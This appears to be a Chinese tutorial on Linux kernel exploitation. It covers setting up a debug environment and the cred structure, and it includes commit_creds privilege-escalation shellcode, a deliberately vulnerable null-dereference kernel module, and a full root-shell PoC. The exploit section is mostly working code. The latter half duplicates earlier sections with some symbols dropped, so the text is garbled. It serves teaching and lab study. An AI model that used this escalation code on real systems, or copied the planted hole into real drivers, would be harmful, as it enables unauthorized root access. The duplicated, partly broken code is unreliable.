Linux内核态漏洞挖掘与利用教学文档<\/h1>

一、内核态与用户态的区别<\/h2>

1. CPU权限级别划分<\/h3>

Intel CPU将权限级别划分为4级（ring 0到ring 3）<\/li>

内核态（ring 0）<\/strong>：

最高权限级别<\/li>
可以访问内存的所有数据<\/li>
可以访问外围设备（硬盘、网卡等）<\/li>
可以在程序间切换<\/li> <\/ul> <\/li>
用户态（ring 3）<\/strong>：

最低权限级别<\/li>
只能受限访问内存<\/li>
不允许访问外围设备<\/li> <\/ul> <\/li> <\/ul>
2. 权限特点<\/h3>

内环可以随意访问外环资源<\/li>
外环被禁止访问内环资源<\/li>
内核态漏洞比用户态漏洞具有更强的破坏力<\/li> <\/ul>
二、Linux内核分析环境搭建<\/h2>
1. 内核编译准备<\/h3>
sudo apt-get install libncurses5-dev <\/span><\/span>sudo apt-get install flex <\/span><\/span>sudo apt-get install bison <\/span><\/span>sudo apt-get install libopenssl-dev <\/span><\/span><\/code><\/pre>2. 内核编译步骤<\/h3> 下载内核源码（如4.19版本）<\/li> 生成默认config文件： make menuconfig <\/span><\/span><\/code><\/pre> 在kernel hacking<\/code>选项中启用调试选项<\/li> <\/ul> <\/li> 编译内核： make <\/span><\/span><\/code><\/pre> 生成文件包括： vmlinux<\/code>：可执行内核文件<\/li> System.map<\/code>：符号表<\/li> bzImage<\/code>：可加载内核镜像（位于arch\/x86\/boot<\/code>）<\/li> <\/ul> <\/li> <\/ul> <\/li> <\/ol> 3. 文件系统构建（使用BusyBox）<\/h3> 下载BusyBox源码<\/p> <\/li> 配置编译选项：<\/p> make menuconfig <\/span><\/span><\/code><\/pre> 选择static binary<\/code><\/li> <\/ul> <\/li> 编译安装：<\/p> make install <\/span><\/span><\/code><\/pre> 生成_install<\/code>目录<\/li> <\/ul> <\/li> 初始化脚本（在_install<\/code>目录下）：<\/p> #!\/bin\/sh <\/span><\/span><\/span><\/span>mkdir -pv {<\/span>bin,sbin,etc,proc,sys,usr\/{<\/span>bin,sbin}}<\/span> <\/span><\/span>echo """#!\/bin\/sh <\/span><\/span><\/span>mount -t proc none \/proc <\/span><\/span><\/span>mount -t sysfs none \/sys <\/span><\/span><\/span>mount -t debugfs none \/sys\/kernel\/debug <\/span><\/span><\/span>mkdir \/tmp <\/span><\/span><\/span>mount -t tmpfs none \/tmp <\/span><\/span><\/span>mdev -s <\/span><\/span><\/span>exec \/bin\/sh"""<\/span> >> init <\/span><\/span>chmod +x init <\/span><\/span><\/code><\/pre><\/li> 打包文件系统：<\/p> find . | cpio -o --format=<\/span>newc > ..\/rootfs.cpio <\/span><\/span><\/code><\/pre><\/li> <\/ol> 4. 运行内核<\/h3> qemu-system-x86_64 -kernel .\/bzImage -initrd .\/rootfs.cpio -s -append "nokaslr"<\/span> <\/span><\/span><\/code><\/pre> -s<\/code>：允许gdb远程调试<\/li> nokaslr<\/code>：禁用内核地址空间布局随机化<\/li> <\/ul> 5. 调试内核<\/h3> 使用gdb连接： gdb vmlinux <\/span><\/span>(<\/span>gdb)<\/span> target remote :1234 <\/span><\/span><\/code><\/pre><\/li> 设置断点（如new_sync_read<\/code>）<\/li> <\/ol> 三、内核提权基础<\/h2> 1. 基本概念<\/h3> 用户<\/strong>：权限的凭证和归属<\/li> 权限<\/strong>：控制用户对资源（CPU、内存、文件等）的访问<\/li> 进程<\/strong>：程序执行的实例<\/li> 进程权限<\/strong>：进程携带用户身份信息进行合法操作<\/li> <\/ul> 2. 关键数据结构<\/h3> task_struct（进程描述符）<\/h4> 定义在include\/sched.h<\/code><\/li> 包含进程的所有信息<\/li> 关键成员： pid<\/code>：进程ID<\/li> cred<\/code>：权限凭证结构<\/li> real_cred<\/code>：客体证书<\/li> <\/ul> <\/li> <\/ul> cred结构<\/h4> struct<\/span> cred { <\/span><\/span> atomic_t usage; <\/span><\/span> kuid_t uid; \/\/ 真实用户ID <\/span><\/span><\/span><\/span> kgid_t gid; \/\/ 真实组ID <\/span><\/span><\/span><\/span> kuid_t suid; \/\/ 保存的用户ID <\/span><\/span><\/span><\/span> kgid_t sgid; \/\/ 保存的组ID <\/span><\/span><\/span><\/span> kuid_t euid; \/\/ 有效用户ID <\/span><\/span><\/span><\/span> kgid_t egid; \/\/ 有效组ID <\/span><\/span><\/span><\/span> kuid_t fsuid; \/\/ 文件系统用户ID <\/span><\/span><\/span><\/span> kgid_t fsgid; \/\/ 文件系统组ID <\/span><\/span><\/span><\/span> kernel_cap_t cap_inheritable; \/\/ 子进程可继承的能力 <\/span><\/span><\/span><\/span> kernel_cap_t cap_permitted; \/\/ 允许的能力 <\/span><\/span><\/span><\/span> kernel_cap_t cap_effective; \/\/ 实际可用的能力 <\/span><\/span><\/span><\/span> \/\/ ...其他成员 <\/span><\/span><\/span><\/span>}; <\/span><\/span><\/code><\/pre>3. 提权方法<\/h3> 方法一：使用内核函数<\/h4> commit_creds(prepare_kernel_cred(0<\/span>)); <\/span><\/span><\/code><\/pre> prepare_kernel_cred(0)<\/code>：生成root权限的cred结构（获取init进程的cred）<\/li> commit_creds()<\/code>：替换当前进程的cred结构<\/li> <\/ul> 方法二：直接修改cred结构<\/h4> 将cred结构中的uid<\/code>、gid<\/code>、euid<\/code>等字段都设为0<\/p> 4. 获取函数地址<\/h3> 通过IDA分析vmlinux<\/code>文件 commit_creds<\/code>：0xFFFFFFFF810B9810<\/li> prepare_kernel_cred<\/code>：0xFFFFFFFF810B9C00<\/li> <\/ul> <\/li> 通过\/proc\/kallsyms<\/code>获取<\/li> 通过调试器获取<\/li> <\/ol> 5. Shellcode示例<\/h3> xor<\/span> rdi<\/span>, rdi<\/span> <\/span><\/span>mov<\/span> rbx<\/span>, 0xFFFFFFFF810B9C00<\/span> ; prepare_kernel_cred地址 <\/span><\/span><\/span><\/span>call<\/span> rbx<\/span> <\/span><\/span>mov<\/span> rbx<\/span>, 0xFFFFFFFF810B9810<\/span> ; commit_creds地址 <\/span><\/span><\/span><\/span>call<\/span> rbx<\/span> <\/span><\/span>ret<\/span> <\/span><\/span><\/code><\/pre>6. 查找当前进程task_struct<\/h3> 32位环境<\/h4> 通过ESP寄存器：<\/li> <\/ol> register<\/span> unsigned<\/span> long<\/span> current_stack_pointer asm<\/span>("esp"<\/span>); <\/span><\/span>static<\/span> inline<\/span> struct<\/span> thread_info *<\/span>current_thread_info<\/span>(void<\/span>) { <\/span><\/span> return<\/span> (struct<\/span> thread_info *<\/span>)(current_stack_pointer &<\/span> ~<\/span>(THREAD_SIZE -<\/span> 1<\/span>)); <\/span><\/span>} <\/span><\/span>static<\/span> __always_inline struct<\/span> task_struct *<\/span>get_current<\/span>(void<\/span>) { <\/span><\/span> return<\/span> current_thread_info()-><\/span>task; <\/span><\/span>} <\/span><\/span><\/code><\/pre>64位环境<\/h4> 通过GS寄存器：<\/p> mov<\/span> rax<\/span>, gs<\/span>:current_task<\/span> <\/span><\/span>mov<\/span> rax<\/span>, [rax<\/span>+<\/span>0<\/span>A48h<\/span>] <\/span><\/span><\/code><\/pre>四、可加载内核模块<\/h2> 1. 基本操作<\/h3> insmod # 装载内核模块<\/span> <\/span><\/span>lsmod # 列出内核模块<\/span> <\/span><\/span>rmmod # 卸载内核模块<\/span> <\/span><\/span><\/code><\/pre>2. 内核保护机制<\/h3> 机制<\/th> 描述<\/th> 类比用户层<\/th> <\/tr> <\/thead> KASLR<\/td> 内核空间地址随机化<\/td> ASLR<\/td> <\/tr> stack protector<\/td> 内核栈保护<\/td> Stack Canary<\/td> <\/tr> SMAP<\/td> 禁止内核访问用户态数据<\/td> -<\/td> <\/tr> SMEP<\/td> 禁止内核执行用户态代码<\/td> NX<\/td> <\/tr> MMAP_MIN_ADDR<\/td> mmap最小地址限制<\/td> -<\/td> <\/tr> KPTI<\/td> 内核页表隔离<\/td> -<\/td> <\/tr> <\/tbody> <\/table> 3. 用户与内核交互方式<\/h3> 系统调用（syscall）<\/strong>：用户空间和内核空间的桥梁<\/li> ioctl<\/strong>：直接与驱动设备通信<\/li> 文件操作<\/strong>：open\/read\/write（驱动设备映射为文件）<\/li> <\/ol> 4. 常见漏洞类型<\/h3> 空指针解引用<\/strong>：UNINITIALIZED\/NONVALIDATED\/CORRUPTED POINTER DEREFERENCE<\/li> 内存破坏<\/strong>：内核栈\/堆漏洞<\/li> 整数问题<\/strong>：整数溢出、符号转换错误<\/li> 竞争条件<\/strong>：如double fetch漏洞<\/li> <\/ol> 五、漏洞利用实例：空指针解引用<\/h2> 1. 漏洞模块代码<\/h3> #include<\/span> <linux\/init.h><\/span> <\/span><\/span><\/span>#include<\/span> <linux\/module.h><\/span> <\/span><\/span><\/span>#include<\/span> <linux\/kernel.h><\/span> <\/span><\/span><\/span>#include<\/span> <linux\/proc_fs.h><\/span> <\/span><\/span><\/span>#include<\/span> <linux\/seq_file.h><\/span> <\/span><\/span><\/span><\/span> <\/span><\/span>void<\/span> (*<\/span>my_funptr)(void<\/span>) =<\/span> 0x10000<\/span>; <\/span><\/span> <\/span><\/span>ssize_t nullp_write<\/span>(struct<\/span> file *<\/span>file, const<\/span> char<\/span> __user *<\/span>buf, <\/span><\/span> size_t len, loff_t *<\/span>loff) { <\/span><\/span> my_funptr(); <\/span><\/span> return<\/span> len; <\/span><\/span>} <\/span><\/span> <\/span><\/span>static<\/span> int<\/span> __init null_dereference_init<\/span>(void<\/span>) { <\/span><\/span> printk(KERN_ALERT "null_dereference driver init!<\/span>\n<\/span>"<\/span>); <\/span><\/span> static<\/span> const<\/span> struct<\/span> file_operations mytest_proc_fops =<\/span> { <\/span><\/span> .write =<\/span> nullp_write, <\/span><\/span> }; <\/span><\/span> proc_create("test_kernel_npd"<\/span>, 0666<\/span>, 0<\/span>, &<\/span>mytest_proc_fops); <\/span><\/span> return<\/span> 0<\/span>; <\/span><\/span>} <\/span><\/span> <\/span><\/span>static<\/span> void<\/span> __exit null_dereference_exit<\/span>(void<\/span>) { <\/span><\/span> printk(KERN_ALERT "null_dereference driver exit<\/span>\n<\/span>"<\/span>); <\/span><\/span>} <\/span><\/span> <\/span><\/span>module_init(null_dereference_init); <\/span><\/span>module_exit(null_dereference_exit); <\/span><\/span><\/code><\/pre>2. 利用步骤<\/h3> 使用mmap映射0x10000地址： void<\/span> *<\/span>addr0 =<\/span> mmap(0x10000<\/span>, 4096<\/span>, PROT_READ|<\/span>PROT_WRITE|<\/span>PROT_EXEC, <\/span><\/span> MAP_FIXED|<\/span>MAP_PRIVATE|<\/span>MAP_ANONYMOUS, -<\/span>1<\/span>, 0<\/span>); <\/span><\/span><\/code><\/pre><\/li> 将shellcode复制到该地址： memcpy(addr0, mypoc, 24<\/span>); <\/span><\/span><\/code><\/pre><\/li> 触发漏洞： int<\/span> mfd =<\/span> open("\/proc\/test_kernel_npd"<\/span>, O_RDWR); <\/span><\/span>int<\/span> res =<\/span> write(mfd, "run shellcode"<\/span>, 14<\/span>); <\/span><\/span><\/code><\/pre><\/li> <\/ol> 3. PoC代码<\/h3> #include<\/span> <sys\/types.h><\/span> <\/span><\/span><\/span>#include<\/span> <sys\/stat.h><\/span> <\/span><\/span><\/span>#include<\/span> <fcntl.h><\/span> <\/span><\/span><\/span>#include<\/span> <stdio.h><\/span> <\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span> <\/span><\/span><\/span>#include<\/span> <sys\/mman.h><\/span> <\/span><\/span><\/span><\/span> <\/span><\/span>unsigned<\/span> char<\/span> *<\/span>mypoc =<\/span> "H1<\/span>\xff\xe0<\/span>H<\/span>\xc7\xc3\x00\x9c\x0b\x81\xff\xd3<\/span>H<\/span>\xc7\xc3\x10\x98\x0b\x81\xff\xd3\xc3<\/span>"<\/span>; <\/span><\/span> <\/span><\/span>int<\/span> main<\/span>() { <\/span><\/span> void<\/span> *<\/span>addr0 =<\/span> mmap(0x10000<\/span>, 4096<\/span>, PROT_READ|<\/span>PROT_WRITE|<\/span>PROT_EXEC, <\/span><\/span> MAP_FIXED|<\/span>MAP_PRIVATE|<\/span>MAP_ANONYMOUS, -<\/span>1<\/span>, 0<\/span>); <\/span><\/span> memcpy(addr0, mypoc, 24<\/span>); <\/span><\/span> <\/span><\/span> int<\/span> mfd =<\/span> open("\/proc\/test_kernel_npd"<\/span>, O_RDWR); <\/span><\/span> int<\/span> res =<\/span> write(mfd, "run shellcode"<\/span>, 14<\/span>); <\/span><\/span> <\/span><\/span> system("\/bin\/bash"<\/span>); <\/span><\/span> return<\/span> 0<\/span>; <\/span><\/span>} <\/span><\/span><\/code><\/pre>六、总结<\/h2> 内核漏洞利用需要理解内核态与用户态的区别<\/li> 搭建调试环境是分析内核漏洞的基础<\/li> 提权的核心是修改进程的cred结构<\/li> 不同架构下获取当前进程task_struct的方法不同<\/li> 内核保护机制增加了漏洞利用的难度<\/li> 实际利用时需要根据漏洞类型选择合适的利用方法<\/li> <\/ol>

机制<\/th>	描述<\/th>	类比用户层<\/th> <\/tr> <\/thead>
KASLR<\/td>	内核空间地址随机化<\/td>	ASLR<\/td> <\/tr>
stack protector<\/td>	内核栈保护<\/td>	Stack Canary<\/td> <\/tr>
SMAP<\/td>	禁止内核访问用户态数据<\/td>	-<\/td> <\/tr>
SMEP<\/td>	禁止内核执行用户态代码<\/td>	NX<\/td> <\/tr>
MMAP_MIN_ADDR<\/td>	mmap最小地址限制<\/td>	-<\/td> <\/tr>
KPTI<\/td>	内核页表隔离<\/td>	-<\/td> <\/tr> <\/tbody> <\/table> 3. 用户与内核交互方式<\/h3> 系统调用（syscall）<\/strong>：用户空间和内核空间的桥梁<\/li> ioctl<\/strong>：直接与驱动设备通信<\/li> 文件操作<\/strong>：open\/read\/write（驱动设备映射为文件）<\/li> <\/ol> 4. 常见漏洞类型<\/h3> 空指针解引用<\/strong>：UNINITIALIZED\/NONVALIDATED\/CORRUPTED POINTER DEREFERENCE<\/li> 内存破坏<\/strong>：内核栈\/堆漏洞<\/li> 整数问题<\/strong>：整数溢出、符号转换错误<\/li> 竞争条件<\/strong>：如double fetch漏洞<\/li> <\/ol> 五、漏洞利用实例：空指针解引用<\/h2> 1. 漏洞模块代码<\/h3> #include<\/span> <linux\/init.h><\/span> <\/span><\/span><\/span>#include<\/span> <linux\/module.h><\/span> <\/span><\/span><\/span>#include<\/span> <linux\/kernel.h><\/span> <\/span><\/span><\/span>#include<\/span> <linux\/proc_fs.h><\/span> <\/span><\/span><\/span>#include<\/span> <linux\/seq_file.h><\/span> <\/span><\/span><\/span><\/span> <\/span><\/span>void<\/span> (<\/span>my_funptr)(void<\/span>) =<\/span> 0x10000<\/span>; <\/span><\/span> <\/span><\/span>ssize_t nullp_write<\/span>(struct<\/span> file <\/span>file, const<\/span> char<\/span> __user <\/span>buf, <\/span><\/span> size_t len, loff_t <\/span>loff) { <\/span><\/span> my_funptr(); <\/span><\/span> return<\/span> len; <\/span><\/span>} <\/span><\/span> <\/span><\/span>static<\/span> int<\/span> __init null_dereference_init<\/span>(void<\/span>) { <\/span><\/span> printk(KERN_ALERT "null_dereference driver init!<\/span>\n<\/span>"<\/span>); <\/span><\/span> static<\/span> const<\/span> struct<\/span> file_operations mytest_proc_fops =<\/span> { <\/span><\/span> .write =<\/span> nullp_write, <\/span><\/span> }; <\/span><\/span> proc_create("test_kernel_npd"<\/span>, 0666<\/span>, 0<\/span>, &<\/span>mytest_proc_fops); <\/span><\/span> return<\/span> 0<\/span>; <\/span><\/span>} <\/span><\/span> <\/span><\/span>static<\/span> void<\/span> __exit null_dereference_exit<\/span>(void<\/span>) { <\/span><\/span> printk(KERN_ALERT "null_dereference driver exit<\/span>\n<\/span>"<\/span>); <\/span><\/span>} <\/span><\/span> <\/span><\/span>module_init(null_dereference_init); <\/span><\/span>module_exit(null_dereference_exit); <\/span><\/span><\/code><\/pre>2. 利用步骤<\/h3> 使用mmap映射0x10000地址： void<\/span> <\/span>addr0 =<\/span> mmap(0x10000<\/span>, 4096<\/span>, PROT_READ\|<\/span>PROT_WRITE\|<\/span>PROT_EXEC, <\/span><\/span> MAP_FIXED\|<\/span>MAP_PRIVATE\|<\/span>MAP_ANONYMOUS, -<\/span>1<\/span>, 0<\/span>); <\/span><\/span><\/code><\/pre><\/li> 将shellcode复制到该地址： memcpy(addr0, mypoc, 24<\/span>); <\/span><\/span><\/code><\/pre><\/li> 触发漏洞： int<\/span> mfd =<\/span> open("\/proc\/test_kernel_npd"<\/span>, O_RDWR); <\/span><\/span>int<\/span> res =<\/span> write(mfd, "run shellcode"<\/span>, 14<\/span>); <\/span><\/span><\/code><\/pre><\/li> <\/ol> 3. PoC代码<\/h3> #include<\/span> <sys\/types.h><\/span> <\/span><\/span><\/span>#include<\/span> <sys\/stat.h><\/span> <\/span><\/span><\/span>#include<\/span> <fcntl.h><\/span> <\/span><\/span><\/span>#include<\/span> <stdio.h><\/span> <\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span> <\/span><\/span><\/span>#include<\/span> <sys\/mman.h><\/span> <\/span><\/span><\/span><\/span> <\/span><\/span>unsigned<\/span> char<\/span> <\/span>mypoc =<\/span> "H1<\/span>\xff\xe0<\/span>H<\/span>\xc7\xc3\x00\x9c\x0b\x81\xff\xd3<\/span>H<\/span>\xc7\xc3\x10\x98\x0b\x81\xff\xd3\xc3<\/span>"<\/span>; <\/span><\/span> <\/span><\/span>int<\/span> main<\/span>() { <\/span><\/span> void<\/span> *<\/span>addr0 =<\/span> mmap(0x10000<\/span>, 4096<\/span>, PROT_READ\|<\/span>PROT_WRITE\|<\/span>PROT_EXEC, <\/span><\/span> MAP_FIXED\|<\/span>MAP_PRIVATE\|<\/span>MAP_ANONYMOUS, -<\/span>1<\/span>, 0<\/span>); <\/span><\/span> memcpy(addr0, mypoc, 24<\/span>); <\/span><\/span> <\/span><\/span> int<\/span> mfd =<\/span> open("\/proc\/test_kernel_npd"<\/span>, O_RDWR); <\/span><\/span> int<\/span> res =<\/span> write(mfd, "run shellcode"<\/span>, 14<\/span>); <\/span><\/span> <\/span><\/span> system("\/bin\/bash"<\/span>); <\/span><\/span> return<\/span> 0<\/span>; <\/span><\/span>} <\/span><\/span><\/code><\/pre>六、总结<\/h2> 内核漏洞利用需要理解内核态与用户态的区别<\/li> 搭建调试环境是分析内核漏洞的基础<\/li> 提权的核心是修改进程的cred结构<\/li> 不同架构下获取当前进程task_struct的方法不同<\/li> 内核保护机制增加了漏洞利用的难度<\/li> 实际利用时需要根据漏洞类型选择合适的利用方法<\/li> <\/ol>